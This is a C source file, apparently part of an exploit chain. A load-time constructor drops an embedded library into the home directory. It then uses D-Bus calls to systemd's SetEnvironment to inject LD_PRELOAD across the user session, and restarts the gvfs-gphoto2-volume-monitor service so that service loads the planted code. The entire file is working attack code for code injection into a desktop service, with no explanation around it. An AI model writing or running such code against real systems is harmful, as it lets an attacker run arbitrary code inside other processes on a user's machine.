#define _GNU_SOURCE
#include <dbus/dbus.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>

static char preload_path[1000];

static void load_library(void) {
  DBusError error;
  dbus_error_init(&error);

  DBusConnection *con = dbus_bus_get(DBUS_BUS_SESSION, &error);
  if (!con) errx(1, "dbus connect failed: %s\n", error.message);


  // ===== inject LD_PRELOAD environment variable =====
  DBusMessage *msg = dbus_message_new_method_call("org.freedesktop.systemd1", "/org/freedesktop/systemd1", "org.freedesktop.systemd1.Manager", "SetEnvironment");
  if (!msg) errx(1, "allocate msg");

  // I understand char**, but why the heck does this want a char***?
  char arg[1000];
  sprintf(arg, "LD_PRELOAD=%s", preload_path);
  char *args[] = {arg};
  char **argsp = args;
  if (!dbus_message_append_args(msg, DBUS_TYPE_ARRAY, DBUS_TYPE_STRING, &argsp, 1, DBUS_TYPE_INVALID)) errx(1, "add args");

  DBusMessage *reply = dbus_connection_send_with_reply_and_block(con, msg, -1, &error);
  if (dbus_error_is_set(&error)) errx(1, "send: %s: %s", error.name, error.message);
  if (!reply) errx(1, "no reply?");
  puts("got reply");


  // ===== restart the gvfs-gphoto2-volume-monitor with injected LD_PRELOAD =====
  msg = dbus_message_new_method_call("org.freedesktop.systemd1", "/org/freedesktop/systemd1/unit/gvfs_2dgphoto2_2dvolume_2dmonitor_2eservice", "org.freedesktop.systemd1.Unit", "Restart");
  if (!msg) errx(1, "allocate msg");
  char *restart_arg = "replace";
  if (!dbus_message_append_args(msg, DBUS_TYPE_STRING, &restart_arg, DBUS_TYPE_INVALID)) errx(1, "add args");
  reply = dbus_connection_send_with_reply_and_block(con, msg, -1, &error);
  if (dbus_error_is_set(&error)) errx(1, "send: %s: %s", error.name, error.message);
  if (!reply) errx(1, "no reply?");
  puts("got reply 2");
}
static void create_library(void) {
  #include "systemd_service_preload.h"
  int fd = open(preload_path, O_WRONLY|O_TRUNC|O_CREAT, 0644);
  if (fd == -1) err(1, "create preload lib");
  if (write(fd, systemd_service_preload, systemd_service_preload_len) != systemd_service_preload_len) err(1, "write preload lib");
  close(fd);
}
__attribute__((constructor)) static void entry(void) {
  printf("constructor running from %s\n", program_invocation_name);
  sprintf(preload_path, "%s/.systemd_preload_lib", getenv("HOME"));
  create_library();
  load_library();
  exit(0);
}
